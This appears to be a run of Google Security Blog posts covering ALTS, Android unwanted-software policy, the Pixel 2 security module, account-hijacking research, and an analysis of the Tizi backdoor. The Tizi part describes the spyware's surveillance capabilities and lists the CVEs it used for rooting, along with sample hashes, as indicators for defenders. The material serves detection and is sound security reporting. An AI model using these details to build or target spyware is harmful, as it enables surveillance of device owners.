ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected - it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system work at scale:

  1. More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.
  2. Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(1010) RPCs per second.
  3. Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.

Multiple features that ensure security and scalability

Inside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.

ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.

ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.



ALTS ensures the integrity of Google traffic is protected, and encrypted as needed.

After a handshake is complete and the client and server negotiate the necessary shared secrets, ALTS secures RPC traffic by forcing integrity, and optional encryption, using the negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.

More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”

In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”




Updated on 12/14/17 to further distinguish between Unwanted Software Policy and Google Play Developer Program Policy
In our efforts to protect users and serve developers, the Google Safe Browsing team has expanded enforcement of Google's Unwanted Software Policy to further tamp down on unwanted and harmful mobile behaviors on Android. As part of this expanded enforcement, Google Safe Browsing will show warnings on apps and on websites leading to apps that collect a user’s personal data without their consent.

Apps handling personal user data (such as user phone number or email), or device data will be required to prompt users and to provide their own privacy policy in the app. Additionally, if an app collects and transmits personal data unrelated to the functionality of the app then, prior to collection and transmission, the app must prominently highlight how the user data will be used and have the user provide affirmative consent for such use.

These data collection requirements apply to all functions of the app. For example, during analytics and crash reportings, the list of installed packages unrelated to the app may not be transmitted from the device without prominent disclosure and affirmative consent.

These requirements, under the Unwanted Software Policy, apply to apps in Google Play and non-Play app markets. The Google Play team has also published guidelines for how Play apps should handle user data and provide disclosure.

Starting in 60 days, this expanded enforcement of Google’s Unwanted Software Policy may result in warnings shown on user devices via Google Play Protect or on webpages that lead to these apps. Webmasters whose sites show warnings due to distribution of these apps should refer to the Search Console for guidance on remediation and resolution of the warnings. Developers whose apps show warnings should refer to guidance in the Unwanted Software Help Center. Developers can also request an app review using this article on App verification and appeals, which contains guidance applicable to apps in both Google Play and non-Play app stores. Apps published in Google Play have specific criteria to meet under Google Play’s Developer Program Policies; these criteria are outlined in the Play August 2017 announcement.



Google is constantly working to improve our systems that protect users from Potentially Harmful Applications (PHAs). Usually, PHA authors attempt to install their harmful apps on as many devices as possible. However, a few PHA authors spend substantial effort, time, and money to create and install their harmful app on a small number of devices to achieve a certain goal.

This blog post covers Tizi, a backdoor family with some rooting capabilities that was used in a targeted attack against devices in African countries, specifically: Kenya, Nigeria, and Tanzania. We'll talk about how the Google Play Protect and Threat Analysis teams worked together to detect and investigate Tizi-infected apps and remove and block them from Android devices.
What is Tizi?

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.

Here is an example social media post promoting a Tizi-infected app:

What is the scope of Tizi?


What are we doing?

To protect Android devices and users, we used Google Play Protect to disable Tizi-infected apps on affected devices and have notified users of all known affected devices. The developers' accounts have been suspended from Play.

The Google Play Protect team also used information and signals from the Tizi apps to update Google's on-device security services and the systems that search for PHAs. These enhancements have been enabled for all users of our security services and increases coverage for Google Play users and the rest of the Android ecosystem.

Additionally, there is more technical information below to help the security industry in our collective work against PHAs.


What do I need to do?

Through our investigation, we identified around 1,300 devices affected by Tizi. To reduce the chance of your device being affected by PHAs and other threats, we recommend these 5 basic steps:
  • Check permissions: Be cautious with apps that request unreasonable permissions. For example, a flashlight app shouldn't need access to send SMS messages.
  • Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.
  • Update your device: Keep your device up-to-date with the latest security patches. Tizi exploited older and publicly known security vulnerabilities, so devices that have up-to-date security patches are less exposed to this kind of attack.
  • Google Play Protect: Ensure Google Play Protect is enabled.
  • Locate your device: Practice finding your device, because you are far more likely to lose your device than install a PHA.

How does Tizi work?

The Google Play Protect team had previously classified some samples as spyware or backdoor PHAs without connecting them as a family. The early Tizi variants didn't have rooting capabilities or obfuscation, but later variants did.

After gaining root, Tizi steals sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. It usually first contacts its command-and-control servers by sending an SMS with the device's GPS coordinates to a specific number. Subsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server. The backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps. Tizi apps can also record ambient audio and take pictures without displaying the image on the device's screen.

Tizi can root the device by exploiting one of the following local vulnerabilities:
  • CVE-2012-4220
  • CVE-2013-2596
  • CVE-2013-2597
  • CVE-2013-2595
  • CVE-2013-2094
  • CVE-2013-6282
  • CVE-2014-3153
  • CVE-2015-3636
  • CVE-2015-1805
Most of these vulnerabilities target older chipsets, devices, and Android versions. All of the listed vulnerabilities are fixed on devices with a security patch level of April 2016 or later, and most of them were patched considerably prior to this date. Devices with this patch level or later are far less exposed to Tizi's capabilities. If a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls.


Samples uploaded to VirusTotal

To encourage further research in the security community, here are some sample applications embedding Tizi that were already on VirusTotal.

Package name
SHA256 digest
SHA1 certificate
com.press.nasa.com.tanofresh
4d780a6fc18458311250d4d1edc750468fdb9b3e4c950dce5b35d4567b47d4a7
816bbee3cab5eed00b8bd16df56032a96e243201
com.dailyworkout.tizi
7c6af091a7b0f04fb5b212bd3c180ddcc6abf7cd77478fd22595e5b7aa7cfd9f
404b4d1a7176e219eaa457b0050b4081c22a9a1a
com.system.update.systemupdate
7a956c754f003a219ea1d2205de3ef5bc354419985a487254b8aeb865442a55e
4d2962ac1f6551435709a5a874595d855b1fa8ab


Additional digests linked to Tizi

To encourage further research in the security community, here are some sample digests of exploits and utilities that were used or abused by Tizi.

Filename
SHA256 digest
run_root_shell
f2e45ea50fc71b62d9ea59990ced755636286121437ced6237aff90981388f6a
iovyroot
4d0887f41d0de2f31459c14e3133debcdf758ad8bbe57128d3bec2c907f2acf3
filesbetyangu.tar
9869871ed246d5670ebca02bb265a584f998f461db0283103ba58d4a650333be


The new Google Pixel 2 ships with a dedicated hardware security module designed to be robust against physical attacks. This hardware module performs lockscreen passcode verification and protects your lock screen better than software alone.

To learn more about the new protections, let’s first review the role of the lock screen. Enabling a lock screen protects your data, not just against casual thieves, but also against sophisticated attacks. Many Android devices, including all Pixel phones, use your lockscreen passcode to derive the key that is then used to encrypt your data. Before you unlock your phone for the first time after a reboot, an attacker cannot recover the key (and hence your data) without knowing your passcode first. To protect against brute-force guessing your passcode, devices running Android 7.0+ verify your attempts in a secure environment that limits how often you can repeatedly guess. Only when the secure environment has successfully verified your passcode does it reveal a device and user-specific secret used to derive the disk encryption key.

Benefits of tamper-resistant hardware

The goal of these protections is to prevent attackers from decrypting your data without knowing your passcode, but the protections are only as strong as the secure environment that verifies the passcode. Performing these types of security-critical operations in tamper-resistant hardware significantly increases the difficulty of attacking it.
Tamper-resistant hardware comes in the form of a discrete chip separate from the System on a Chip (SoC). It includes its own flash, RAM, and other resources inside a single package, so it can fully control its own execution. It can also detect and defend against outside attempts to physically tamper with it.

In particular:
  • Because it has its own dedicated RAM, it’s robust against many side-channel information leakage attacks, such as those described in the TruSpy cache side-channel paper.
  • Because it has its own dedicated flash, it’s harder to interfere with its ability to store state persistently.
  • It loads its operating system and software directly from internal ROM and flash, and it controls all updates to it, so attackers can’t directly tamper with its software to inject malicious code.
  • Tamper-resistant hardware is resilient against many physical fault injection techniques including attempts to run outside normal operating conditions, such as wrong voltage, wrong clock speed, or wrong temperature. This is standardized in specifications such as the SmartCard IC Platform Protection Profile, and tamper-resistant hardware is often certified to these standards.
  • Tamper-resistant hardware is usually housed in a package that is resistant to physical penetration and designed to resist side channel attacks, including power analysis, timing analysis, and electromagnetic sniffing, such as described in the SoC it to EM paper.
Security module in Pixel 2

The new Google Pixel 2 ships with a security module built using tamper-resistant hardware that protects your lock screen and your data against many sophisticated hardware attacks.

In addition to all the benefits already mentioned, the security module in Pixel 2 also helps protect you against software-only attacks:
  • Because it performs very few functions, it has a super small attack surface.
  • With passcode verification happening in the security module, even in the event of a full compromise elsewhere, the attacker cannot derive your disk encryption key without compromising the security module first.
  • The security module is designed so that nobody, including Google, can update the passcode verification logic to a weakened version without knowing your passcode first.
Summary

Just like many other Google products, such as Chromebooks and Cloud, Android and Pixel are investing in additional hardware protections to make your device more secure. With the new Google Pixel 2, your data is safer against an entire class of sophisticated hardware attacks.


Account takeover, or ‘hijacking’, is unfortunately a common problem for users across the web. More than 15% of Internet users have reported experiencing the takeover of an email or social networking account. However, despite its familiarity, there is a dearth of research about the root causes of hijacking.

With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data. We’ve highlighted some important findings from our investigation below. We presented our study at the Conference on Computer and Communications Security (CCS) and it’s now available here.

What we learned from the research proved to be immediately useful. We applied its insights to our existing protections and secured 67 million Google accounts before they were abused. We’re sharing this information publicly so that other online services can better secure their users, and can also supplement their authentication systems with more protections beyond just passwords.


How hijackers steal passwords on the black market

Our research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.

While our study focused on Google, these password stealing tactics pose a risk to all account-based online services. In the case of third-party data breaches, 12% of the exposed records included a Gmail address serving as a username and a password; of those passwords, 7% were valid due to reuse. When it comes to phishing and keyloggers, attackers frequently target Google accounts to varying success: 12-25% of attacks yield a valid password.

However, because a password alone is rarely sufficient for gaining access to a Google account, increasingly sophisticated attackers also try to collect sensitive data that we may request when verifying an account holder’s identity. We found 82% of blackhat phishing tools and 74% of keyloggers attempted to collect a user’s IP address and location, while another 18% of tools collected phone numbers and device make and model.

By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.

Protecting our users from account takeover

Our findings were clear: enterprising hijackers are constantly searching for, and are able to find, billions of different platforms’ usernames and passwords on black markets. While we have already applied these insights to our existing protections, our findings are yet another reminder that we must continuously evolve our defenses in order to stay ahead of these bad actors and keep users safe.

For many years, we’ve applied a ‘defense in-depth’ approach to security—a layered series of constantly improving protections that automatically prevent, detect, and mitigate threats to keep your account safe.

Prevention

A wide variety of safeguards help us to prevent attacks before they ever affect our users. For example, Safe Browsing, which now protects more than 3 billion devices, alerts users before they visit a dangerous site or when they click a link to a dangerous site within Gmail. We recently announced the Advanced Protection program which provides extra security for users that are at elevated risk of attack.

Detection

We monitor every login attempt to your account for suspicious activity. When there is a sign-in attempt from a device you’ve never used, or a location you don’t commonly access your account from, we’ll require additional information before granting access to your account. For example, if you sign in from a new laptop and you have a phone associated with you account, you will see a prompt—we’re calling these dynamic verification challenges—like this:
This challenge provides two-factor authentication on all suspicious logins, while mitigating the risk of account lockout.

Mitigation

Finally, we regularly scan activity across Google’s suite of products for suspicious actions performed by hijackers and when we find any, we lock down the affected accounts to prevent any further damage as quickly as possible. We prevent or undo actions we attribute to account takeover, notify the affected user, and help them change their password and re-secure their account into a healthy state.

What you can do

There are some simple steps you can take that make these defenses even stronger. Visit our Security Checkup to make sure you have recovery information associated with your account, like a phone number. Allow Chrome to automatically generate passwords for your accounts and save them via Smart Lock. We’re constantly working to improve these tools, and our automatic protections, to keep your data safe.